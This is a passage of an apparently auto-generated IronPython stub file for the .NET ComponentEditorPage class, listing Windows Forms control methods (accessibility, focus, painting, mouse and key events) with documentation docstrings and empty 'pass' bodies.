ComponentEditorPage()
"""
def AccessibilityNotifyClients(self, *args): #cannot find CLR method
"""
AccessibilityNotifyClients(self: Control, accEvent: AccessibleEvents, objectID: int, childID: int)
Notifies the accessibility client applications of the specified
System.Windows.Forms.AccessibleEvents for the specified child control.
accEvent: The System.Windows.Forms.AccessibleEvents to notify the accessibility client applications of.
objectID: The identifier of the System.Windows.Forms.AccessibleObject.
childID: The child System.Windows.Forms.Control to notify of the accessible event.
AccessibilityNotifyClients(self: Control, accEvent: AccessibleEvents, childID: int)
Notifies the accessibility client applications of the specified
System.Windows.Forms.AccessibleEvents for the specified child control.
accEvent: The System.Windows.Forms.AccessibleEvents to notify the accessibility client applications of.
childID: The child System.Windows.Forms.Control to notify of the accessible event.
"""
pass
def Activate(self):
"""
Activate(self: ComponentEditorPage)
Activates and displays the page.
"""
pass
def AdjustFormScrollbars(self, *args): #cannot find CLR method
"""
AdjustFormScrollbars(self: ScrollableControl, displayScrollbars: bool)
Adjusts the scroll bars on the container based on the current control positions and the control
currently selected.
displayScrollbars: true to show the scroll bars; otherwise, false.
"""
pass
def ApplyChanges(self):
"""
ApplyChanges(self: ComponentEditorPage)
Applies changes to all the components being edited.
"""
pass
def CreateAccessibilityInstance(self, *args): #cannot find CLR method
"""
CreateAccessibilityInstance(self: Control) -> AccessibleObject
Creates a new accessibility object for the control.
Returns: A new System.Windows.Forms.AccessibleObject for the control.
"""
pass
def CreateControlsInstance(self, *args): #cannot find CLR method
"""
CreateControlsInstance(self: Control) -> ControlCollection
Creates a new instance of the control collection for the control.
Returns: A new instance of System.Windows.Forms.Control.ControlCollection assigned to the control.
"""
pass
def CreateHandle(self, *args): #cannot find CLR method
"""
CreateHandle(self: Control)
Creates a handle for the control.
"""
pass
def Deactivate(self):
"""
Deactivate(self: ComponentEditorPage)
Deactivates and hides the page.
"""
pass
def DefWndProc(self, *args): #cannot find CLR method
"""
DefWndProc(self: Control, m: Message) -> Message
Sends the specified message to the default window procedure.
m: The Windows System.Windows.Forms.Message to process.
"""
pass
def DestroyHandle(self, *args): #cannot find CLR method
"""
DestroyHandle(self: Control)
Destroys the handle associated with the control.
"""
pass
def Dispose(self):
"""
Dispose(self: Control, disposing: bool)
Releases the unmanaged resources used by the System.Windows.Forms.Control and its child controls
and optionally releases the managed resources.
disposing: true to release both managed and unmanaged resources; false to release only unmanaged resources.
"""
pass
def EnterLoadingMode(self, *args): #cannot find CLR method
"""
EnterLoadingMode(self: ComponentEditorPage)
Increments the loading counter.
"""
pass
def ExitLoadingMode(self, *args): #cannot find CLR method
"""
ExitLoadingMode(self: ComponentEditorPage)
Decrements the loading counter.
"""
pass
def GetAccessibilityObjectById(self, *args): #cannot find CLR method
"""
GetAccessibilityObjectById(self: Control, objectId: int) -> AccessibleObject
Retrieves the specified System.Windows.Forms.AccessibleObject.
objectId: An Int32 that identifies the System.Windows.Forms.AccessibleObject to retrieve.
Returns: An System.Windows.Forms.AccessibleObject.
"""
pass
def GetAutoSizeMode(self, *args): #cannot find CLR method
"""
GetAutoSizeMode(self: Control) -> AutoSizeMode
Retrieves a value indicating how a control will behave when its
System.Windows.Forms.Control.AutoSize property is enabled.
Returns: One of the System.Windows.Forms.AutoSizeMode values.
"""
pass
def GetControl(self):
"""
GetControl(self: ComponentEditorPage) -> Control
Gets the control that represents the window for this page.
Returns: The System.Windows.Forms.Control that represents the window for this page.
"""
pass
def GetScaledBounds(self, *args): #cannot find CLR method
"""
GetScaledBounds(self: Control, bounds: Rectangle, factor: SizeF, specified: BoundsSpecified) -> Rectangle
Retrieves the bounds within which the control is scaled.
bounds: A System.Drawing.Rectangle that specifies the area for which to retrieve the display bounds.
factor: The height and width of the control's bounds.
specified: One of the values of System.Windows.Forms.BoundsSpecified that specifies the bounds of the
control to use when defining its size and position.
Returns: A System.Drawing.Rectangle representing the bounds within which the control is scaled.
"""
pass
def GetScrollState(self, *args): #cannot find CLR method
"""
GetScrollState(self: ScrollableControl, bit: int) -> bool
Determines whether the specified flag has been set.
bit: The flag to check.
Returns: true if the specified flag has been set; otherwise, false.
"""
pass
def GetSelectedComponent(self, *args): #cannot find CLR method
"""
GetSelectedComponent(self: ComponentEditorPage) -> IComponent
Gets the component that is to be edited.
Returns: The System.ComponentModel.IComponent that is to be edited.
"""
pass
def GetService(self, *args): #cannot find CLR method
"""
GetService(self: Component, service: Type) -> object
Returns an object that represents a service provided by the System.ComponentModel.Component or
by its System.ComponentModel.Container.
service: A service provided by the System.ComponentModel.Component.
Returns: An System.Object that represents a service provided by the System.ComponentModel.Component, or
null if the System.ComponentModel.Component does not provide the specified service.
"""
pass
def GetStyle(self, *args): #cannot find CLR method
"""
GetStyle(self: Control, flag: ControlStyles) -> bool
Retrieves the value of the specified control style bit for the control.
flag: The System.Windows.Forms.ControlStyles bit to return the value from.
Returns: true if the specified control style bit is set to true; otherwise, false.
"""
pass
def GetTopLevel(self, *args): #cannot find CLR method
"""
GetTopLevel(self: Control) -> bool
Determines if the control is a top-level control.
Returns: true if the control is a top-level control; otherwise, false.
"""
pass
def InitLayout(self, *args): #cannot find CLR method
"""
InitLayout(self: Control)
Called after the control has been added to another container.
"""
pass
def InvokeGotFocus(self, *args): #cannot find CLR method
"""
InvokeGotFocus(self: Control, toInvoke: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.GotFocus event for the specified control.
toInvoke: The System.Windows.Forms.Control to assign the event to.
e: An System.EventArgs that contains the event data.
"""
pass
def InvokeLostFocus(self, *args): #cannot find CLR method
"""
InvokeLostFocus(self: Control, toInvoke: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.LostFocus event for the specified control.
toInvoke: The System.Windows.Forms.Control to assign the event to.
e: An System.EventArgs that contains the event data.
"""
pass
def InvokeOnClick(self, *args): #cannot find CLR method
"""
InvokeOnClick(self: Control, toInvoke: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.Click event for the specified control.
toInvoke: The System.Windows.Forms.Control to assign the System.Windows.Forms.Control.Click event to.
e: An System.EventArgs that contains the event data.
"""
pass
def InvokePaint(self, *args): #cannot find CLR method
"""
InvokePaint(self: Control, c: Control, e: PaintEventArgs)
Raises the System.Windows.Forms.Control.Paint event for the specified control.
c: The System.Windows.Forms.Control to assign the System.Windows.Forms.Control.Paint event to.
e: An System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def InvokePaintBackground(self, *args): #cannot find CLR method
"""
InvokePaintBackground(self: Control, c: Control, e: PaintEventArgs)
Raises the PaintBackground event for the specified control.
c: The System.Windows.Forms.Control to assign the System.Windows.Forms.Control.Paint event to.
e: An System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def IsFirstActivate(self, *args): #cannot find CLR method
"""
IsFirstActivate(self: ComponentEditorPage) -> bool
Gets a value indicating whether the page is being activated for the first time.
Returns: true if this is the first time the page is being activated; otherwise, false.
"""
pass
def IsInputChar(self, *args): #cannot find CLR method
"""
IsInputChar(self: Control, charCode: Char) -> bool
Determines if a character is an input character that the control recognizes.
charCode: The character to test.
Returns: true if the character should be sent directly to the control and not preprocessed; otherwise,
false.
"""
pass
def IsInputKey(self, *args): #cannot find CLR method
"""
IsInputKey(self: Control, keyData: Keys) -> bool
Determines whether the specified key is a regular input key or a special key that requires
preprocessing.
keyData: One of the System.Windows.Forms.Keys values.
Returns: true if the specified key is a regular input key; otherwise, false.
"""
pass
def IsLoading(self, *args): #cannot find CLR method
"""
IsLoading(self: ComponentEditorPage) -> bool
Gets a value indicating whether the page is being loaded.
Returns: true if the page is being loaded; otherwise, false.
"""
pass
def IsPageMessage(self, msg):
"""
IsPageMessage(self: ComponentEditorPage, msg: Message) -> (bool, Message)
Processes messages that could be handled by the page.
msg: The message to process.
Returns: true if the page processed the message; otherwise, false.
"""
pass
def LoadComponent(self, *args): #cannot find CLR method
"""
LoadComponent(self: ComponentEditorPage)
Loads the component into the page user interface (UI).
"""
pass
def MemberwiseClone(self, *args): #cannot find CLR method
"""
MemberwiseClone(self: MarshalByRefObject, cloneIdentity: bool) -> MarshalByRefObject
Creates a shallow copy of the current System.MarshalByRefObject object.
cloneIdentity: false to delete the current System.MarshalByRefObject object's identity, which will cause the
object to be assigned a new identity when it is marshaled across a remoting boundary. A value of
false is usually appropriate. true to copy the current System.MarshalByRefObject object's
identity to its clone, which will cause remoting client calls to be routed to the remote server
object.
Returns: A shallow copy of the current System.MarshalByRefObject object.
MemberwiseClone(self: object) -> object
Creates a shallow copy of the current System.Object.
Returns: A shallow copy of the current System.Object.
"""
pass
def NotifyInvalidate(self, *args): #cannot find CLR method
"""
NotifyInvalidate(self: Control, invalidatedArea: Rectangle)
Raises the System.Windows.Forms.Control.Invalidated event with a specified region of the control
to invalidate.
invalidatedArea: A System.Drawing.Rectangle representing the area to invalidate.
"""
pass
def OnApplyComplete(self):
"""
OnApplyComplete(self: ComponentEditorPage)
Called when the page and any sibling pages have applied their changes.
"""
pass
def OnAutoSizeChanged(self, *args): #cannot find CLR method
"""
OnAutoSizeChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.AutoSizeChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnBackColorChanged(self, *args): #cannot find CLR method
"""
OnBackColorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BackColorChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnBackgroundImageChanged(self, *args): #cannot find CLR method
"""
OnBackgroundImageChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BackgroundImageChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnBackgroundImageLayoutChanged(self, *args): #cannot find CLR method
"""
OnBackgroundImageLayoutChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BackgroundImageLayoutChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnBindingContextChanged(self, *args): #cannot find CLR method
"""
OnBindingContextChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BindingContextChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnCausesValidationChanged(self, *args): #cannot find CLR method
"""
OnCausesValidationChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.CausesValidationChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnChangeUICues(self, *args): #cannot find CLR method
"""
OnChangeUICues(self: Control, e: UICuesEventArgs)
Raises the System.Windows.Forms.Control.ChangeUICues event.
e: A System.Windows.Forms.UICuesEventArgs that contains the event data.
"""
pass
def OnClick(self, *args): #cannot find CLR method
"""
OnClick(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.Click event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnClientSizeChanged(self, *args): #cannot find CLR method
"""
OnClientSizeChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ClientSizeChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnContextMenuChanged(self, *args): #cannot find CLR method
"""
OnContextMenuChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ContextMenuChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnContextMenuStripChanged(self, *args): #cannot find CLR method
"""
OnContextMenuStripChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ContextMenuStripChanged event.
e: An System.EventArgs that contains the event data.
"""
pass
def OnControlAdded(self, *args): #cannot find CLR method
"""
OnControlAdded(self: Control, e: ControlEventArgs)
Raises the System.Windows.Forms.Control.ControlAdded event.
e: A System.Windows.Forms.ControlEventArgs that contains the event data.
"""
pass
def OnControlRemoved(self, *args): #cannot find CLR method
"""
OnControlRemoved(self: Control, e: ControlEventArgs)
Raises the System.Windows.Forms.Control.ControlRemoved event.
e: A System.Windows.Forms.ControlEventArgs that contains the event data.
"""
pass
def OnCreateControl(self, *args): #cannot find CLR method
"""
OnCreateControl(self: Control)
Raises the System.Windows.Forms.Control.CreateControl method.
"""
pass
def OnCursorChanged(self, *args): #cannot find CLR method
"""
OnCursorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.CursorChanged event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnDockChanged(self, *args): #cannot find CLR method
"""
OnDockChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.DockChanged event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnDoubleClick(self, *args): #cannot find CLR method
"""
OnDoubleClick(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.DoubleClick event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnDpiChangedAfterParent(self, *args): #cannot find CLR method
""" OnDpiChangedAfterParent(self: Control, e: EventArgs) """
pass
def OnDpiChangedBeforeParent(self, *args): #cannot find CLR method
""" OnDpiChangedBeforeParent(self: Control, e: EventArgs) """
pass
def OnDragDrop(self, *args): #cannot find CLR method
"""
OnDragDrop(self: Control, drgevent: DragEventArgs)
Raises the System.Windows.Forms.Control.DragDrop event.
drgevent: A System.Windows.Forms.DragEventArgs that contains the event data.
"""
pass
def OnDragEnter(self, *args): #cannot find CLR method
"""
OnDragEnter(self: Control, drgevent: DragEventArgs)
Raises the System.Windows.Forms.Control.DragEnter event.
drgevent: A System.Windows.Forms.DragEventArgs that contains the event data.
"""
pass
def OnDragLeave(self, *args): #cannot find CLR method
"""
OnDragLeave(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.DragLeave event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnDragOver(self, *args): #cannot find CLR method
"""
OnDragOver(self: Control, drgevent: DragEventArgs)
Raises the System.Windows.Forms.Control.DragOver event.
drgevent: A System.Windows.Forms.DragEventArgs that contains the event data.
"""
pass
def OnEnabledChanged(self, *args): #cannot find CLR method
"""
OnEnabledChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.EnabledChanged event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnEnter(self, *args): #cannot find CLR method
"""
OnEnter(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.Enter event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnFontChanged(self, *args): #cannot find CLR method
"""
OnFontChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.FontChanged event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnForeColorChanged(self, *args): #cannot find CLR method
"""
OnForeColorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ForeColorChanged event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnGiveFeedback(self, *args): #cannot find CLR method
"""
OnGiveFeedback(self: Control, gfbevent: GiveFeedbackEventArgs)
Raises the System.Windows.Forms.Control.GiveFeedback event.
gfbevent: A System.Windows.Forms.GiveFeedbackEventArgs that contains the event data.
"""
pass
def OnGotFocus(self, *args): #cannot find CLR method
"""
OnGotFocus(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.GotFocus event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnHandleCreated(self, *args): #cannot find CLR method
"""
OnHandleCreated(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.HandleCreated event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnHandleDestroyed(self, *args): #cannot find CLR method
"""
OnHandleDestroyed(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.HandleDestroyed event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnHelpRequested(self, *args): #cannot find CLR method
"""
OnHelpRequested(self: Control, hevent: HelpEventArgs)
Raises the System.Windows.Forms.Control.HelpRequested event.
hevent: A System.Windows.Forms.HelpEventArgs that contains the event data.
"""
pass
def OnImeModeChanged(self, *args): #cannot find CLR method
"""
OnImeModeChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ImeModeChanged event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnInvalidated(self, *args): #cannot find CLR method
"""
OnInvalidated(self: Control, e: InvalidateEventArgs)
Raises the System.Windows.Forms.Control.Invalidated event.
e: A System.Windows.Forms.InvalidateEventArgs that contains the event data.
"""
pass
def OnKeyDown(self, *args): #cannot find CLR method
"""
OnKeyDown(self: Control, e: KeyEventArgs)
Raises the System.Windows.Forms.Control.KeyDown event.
e: A System.Windows.Forms.KeyEventArgs that contains the event data.
"""
pass
def OnKeyPress(self, *args): #cannot find CLR method
"""
OnKeyPress(self: Control, e: KeyPressEventArgs)
Raises the System.Windows.Forms.Control.KeyPress event.
e: A System.Windows.Forms.KeyPressEventArgs that contains the event data.
"""
pass
def OnKeyUp(self, *args): #cannot find CLR method
"""
OnKeyUp(self: Control, e: KeyEventArgs)
Raises the System.Windows.Forms.Control.KeyUp event.
e: A System.Windows.Forms.KeyEventArgs that contains the event data.
"""
pass
def OnLayout(self, *args): #cannot find CLR method
"""
OnLayout(self: ScrollableControl, levent: LayoutEventArgs)
levent: A System.Windows.Forms.LayoutEventArgs that contains the event data.
"""
pass
def OnLeave(self, *args): #cannot find CLR method
"""
OnLeave(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.Leave event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnLocationChanged(self, *args): #cannot find CLR method
"""
OnLocationChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.LocationChanged event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnLostFocus(self, *args): #cannot find CLR method
"""
OnLostFocus(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.LostFocus event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnMarginChanged(self, *args): #cannot find CLR method
"""
OnMarginChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.MarginChanged event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnMouseCaptureChanged(self, *args): #cannot find CLR method
"""
OnMouseCaptureChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.MouseCaptureChanged event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnMouseClick(self, *args): #cannot find CLR method
"""
OnMouseClick(self: Control, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseClick event.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseDoubleClick(self, *args): #cannot find CLR method
"""
OnMouseDoubleClick(self: Control, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseDoubleClick event.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseDown(self, *args): #cannot find CLR method
"""
OnMouseDown(self: Control, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseDown event.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseEnter(self, *args): #cannot find CLR method
"""
OnMouseEnter(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.MouseEnter event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnMouseHover(self, *args): #cannot find CLR method
"""
OnMouseHover(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.MouseHover event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnMouseLeave(self, *args): #cannot find CLR method
"""
OnMouseLeave(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.MouseLeave event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnMouseMove(self, *args): #cannot find CLR method
"""
OnMouseMove(self: Control, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseMove event.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseUp(self, *args): #cannot find CLR method
"""
OnMouseUp(self: Control, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseUp event.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMouseWheel(self, *args): #cannot find CLR method
"""
OnMouseWheel(self: ScrollableControl, e: MouseEventArgs)
Raises the System.Windows.Forms.Control.MouseWheel event.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def OnMove(self, *args): #cannot find CLR method
"""
OnMove(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.Move event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnNotifyMessage(self, *args): #cannot find CLR method
"""
OnNotifyMessage(self: Control, m: Message)
Notifies the control of Windows messages.
m: A System.Windows.Forms.Message that represents the Windows message.
"""
pass
def OnPaddingChanged(self, *args): #cannot find CLR method
"""
OnPaddingChanged(self: ScrollableControl, e: EventArgs)
Raises the System.Windows.Forms.Control.PaddingChanged event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnPaint(self, *args): #cannot find CLR method
"""
OnPaint(self: Control, e: PaintEventArgs)
Raises the System.Windows.Forms.Control.Paint event.
e: A System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def OnPaintBackground(self, *args): #cannot find CLR method
"""
OnPaintBackground(self: ScrollableControl, e: PaintEventArgs)
Paints the background of the control.
e: A System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def OnParentBackColorChanged(self, *args): #cannot find CLR method
"""
OnParentBackColorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BackColorChanged event when the
System.Windows.Forms.Control.BackColor property value of the control's container changes.
e: A System.EventArgs that contains the event data.
"""
pass
def OnParentBackgroundImageChanged(self, *args): #cannot find CLR method
"""
OnParentBackgroundImageChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BackgroundImageChanged event when the
System.Windows.Forms.Control.BackgroundImage property value of the control's container changes.
e: A System.EventArgs that contains the event data.
"""
pass
def OnParentBindingContextChanged(self, *args): #cannot find CLR method
"""
OnParentBindingContextChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.BindingContextChanged event when the
System.Windows.Forms.Control.BindingContext property value of the control's container changes.
e: A System.EventArgs that contains the event data.
"""
pass
def OnParentChanged(self, *args): #cannot find CLR method
"""
OnParentChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ParentChanged event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnParentCursorChanged(self, *args): #cannot find CLR method
"""
OnParentCursorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.CursorChanged event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnParentEnabledChanged(self, *args): #cannot find CLR method
"""
OnParentEnabledChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.EnabledChanged event when the
System.Windows.Forms.Control.Enabled property value of the control's container changes.
e: A System.EventArgs that contains the event data.
"""
pass
def OnParentFontChanged(self, *args): #cannot find CLR method
"""
OnParentFontChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.FontChanged event when the
System.Windows.Forms.Control.Font property value of the control's container changes.
e: A System.EventArgs that contains the event data.
"""
pass
def OnParentForeColorChanged(self, *args): #cannot find CLR method
"""
OnParentForeColorChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.ForeColorChanged event when the
System.Windows.Forms.Control.ForeColor property value of the control's container changes.
e: A System.EventArgs that contains the event data.
"""
pass
def OnParentRightToLeftChanged(self, *args): #cannot find CLR method
"""
OnParentRightToLeftChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.RightToLeftChanged event when the
System.Windows.Forms.Control.RightToLeft property value of the control's container changes.
e: A System.EventArgs that contains the event data.
"""
pass
def OnParentVisibleChanged(self, *args): #cannot find CLR method
"""
OnParentVisibleChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.VisibleChanged event when the
System.Windows.Forms.Control.Visible property value of the control's container changes.
e: A System.EventArgs that contains the event data.
"""
pass
def OnPreviewKeyDown(self, *args): #cannot find CLR method
"""
OnPreviewKeyDown(self: Control, e: PreviewKeyDownEventArgs)
Raises the System.Windows.Forms.Control.PreviewKeyDown event.
e: A System.Windows.Forms.PreviewKeyDownEventArgs that contains the event data.
"""
pass
def OnPrint(self, *args): #cannot find CLR method
"""
OnPrint(self: Control, e: PaintEventArgs)
Raises the System.Windows.Forms.Control.Paint event.
e: A System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def OnQueryContinueDrag(self, *args): #cannot find CLR method
"""
OnQueryContinueDrag(self: Control, qcdevent: QueryContinueDragEventArgs)
Raises the System.Windows.Forms.Control.QueryContinueDrag event.
qcdevent: A System.Windows.Forms.QueryContinueDragEventArgs that contains the event data.
"""
pass
def OnRegionChanged(self, *args): #cannot find CLR method
"""
OnRegionChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.RegionChanged event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnResize(self, *args): #cannot find CLR method
"""
OnResize(self: Panel, eventargs: EventArgs)
Fires the event indicating that the panel has been resized. Inheriting controls should use this
in favor of actually listening to the event, but should still call base.OnResize to ensure that
the event is fired for external listeners.
eventargs: A System.EventArgs that contains the event data.
"""
pass
def OnRightToLeftChanged(self, *args): #cannot find CLR method
"""
OnRightToLeftChanged(self: ScrollableControl, e: EventArgs)
e: A System.EventArgs that contains the event data.
"""
pass
def OnScroll(self, *args): #cannot find CLR method
"""
OnScroll(self: ScrollableControl, se: ScrollEventArgs)
Raises the System.Windows.Forms.ScrollableControl.Scroll event.
se: A System.Windows.Forms.ScrollEventArgs that contains the event data.
"""
pass
def OnSizeChanged(self, *args): #cannot find CLR method
"""
OnSizeChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.SizeChanged event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnStyleChanged(self, *args): #cannot find CLR method
"""
OnStyleChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.StyleChanged event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnSystemColorsChanged(self, *args): #cannot find CLR method
"""
OnSystemColorsChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.SystemColorsChanged event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnTabIndexChanged(self, *args): #cannot find CLR method
"""
OnTabIndexChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.TabIndexChanged event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnTabStopChanged(self, *args): #cannot find CLR method
"""
OnTabStopChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.TabStopChanged event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnTextChanged(self, *args): #cannot find CLR method
"""
OnTextChanged(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.TextChanged event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnValidated(self, *args): #cannot find CLR method
"""
OnValidated(self: Control, e: EventArgs)
Raises the System.Windows.Forms.Control.Validated event.
e: A System.EventArgs that contains the event data.
"""
pass
def OnValidating(self, *args): #cannot find CLR method
"""
OnValidating(self: Control, e: CancelEventArgs)
Raises the System.Windows.Forms.Control.Validating event.
e: A System.ComponentModel.CancelEventArgs that contains the event data.
"""
pass
def OnVisibleChanged(self, *args): #cannot find CLR method
"""
OnVisibleChanged(self: ScrollableControl, e: EventArgs)
e: A System.EventArgs that contains the event data.
"""
pass
def ProcessCmdKey(self, *args): #cannot find CLR method
"""
ProcessCmdKey(self: Control, msg: Message, keyData: Keys) -> (bool, Message)
Processes a command key.
msg: A System.Windows.Forms.Message, passed by reference, that represents the window message to
process.
keyData: One of the System.Windows.Forms.Keys values that represents the key to process.
Returns: true if the character was processed by the control; otherwise, false.
"""
pass
def ProcessDialogChar(self, *args): #cannot find CLR method
"""
ProcessDialogChar(self: Control, charCode: Char) -> bool
Processes a dialog character.
charCode: The character to process.
Returns: true if the character was processed by the control; otherwise, false.
"""
pass
def ProcessDialogKey(self, *args): #cannot find CLR method
"""
ProcessDialogKey(self: Control, keyData: Keys) -> bool
Processes a dialog key.
keyData: One of the System.Windows.Forms.Keys values that represents the key to process.
Returns: true if the key was processed by the control; otherwise, false.
"""
pass
def ProcessKeyEventArgs(self, *args): #cannot find CLR method
"""
ProcessKeyEventArgs(self: Control, m: Message) -> (bool, Message)
Processes a key message and generates the appropriate control events.
m: A System.Windows.Forms.Message, passed by reference, that represents the window message to
process.
Returns: true if the message was processed by the control; otherwise, false.
"""
pass
def ProcessKeyMessage(self, *args): #cannot find CLR method
"""
ProcessKeyMessage(self: Control, m: Message) -> (bool, Message)
Processes a keyboard message.
m: A System.Windows.Forms.Message, passed by reference, that represents the window message to
process.
Returns: true if the message was processed by the control; otherwise, false.
"""
pass
def ProcessKeyPreview(self, *args): #cannot find CLR method
"""
ProcessKeyPreview(self: Control, m: Message) -> (bool, Message)
Previews a keyboard message.
m: A System.Windows.Forms.Message, passed by reference, that represents the window message to
process.
Returns: true if the message was processed by the control; otherwise, false.
"""
pass
def ProcessMnemonic(self, *args): #cannot find CLR method
"""
ProcessMnemonic(self: Control, charCode: Char) -> bool
Processes a mnemonic character.
charCode: The character to process.
Returns: true if the character was processed as a mnemonic by the control; otherwise, false.
"""
pass
def RaiseDragEvent(self, *args): #cannot find CLR method
"""
RaiseDragEvent(self: Control, key: object, e: DragEventArgs)
Raises the appropriate drag event.
key: The event to raise.
e: A System.Windows.Forms.DragEventArgs that contains the event data.
"""
pass
def RaiseKeyEvent(self, *args): #cannot find CLR method
"""
RaiseKeyEvent(self: Control, key: object, e: KeyEventArgs)
Raises the appropriate key event.
key: The event to raise.
e: A System.Windows.Forms.KeyEventArgs that contains the event data.
"""
pass
def RaiseMouseEvent(self, *args): #cannot find CLR method
"""
RaiseMouseEvent(self: Control, key: object, e: MouseEventArgs)
Raises the appropriate mouse event.
key: The event to raise.
e: A System.Windows.Forms.MouseEventArgs that contains the event data.
"""
pass
def RaisePaintEvent(self, *args): #cannot find CLR method
"""
RaisePaintEvent(self: Control, key: object, e: PaintEventArgs)
Raises the appropriate paint event.
key: The event to raise.
e: A System.Windows.Forms.PaintEventArgs that contains the event data.
"""
pass
def RecreateHandle(self, *args): #cannot find CLR method
"""
RecreateHandle(self: Control)
Forces the re-creation of the handle for the control.
"""
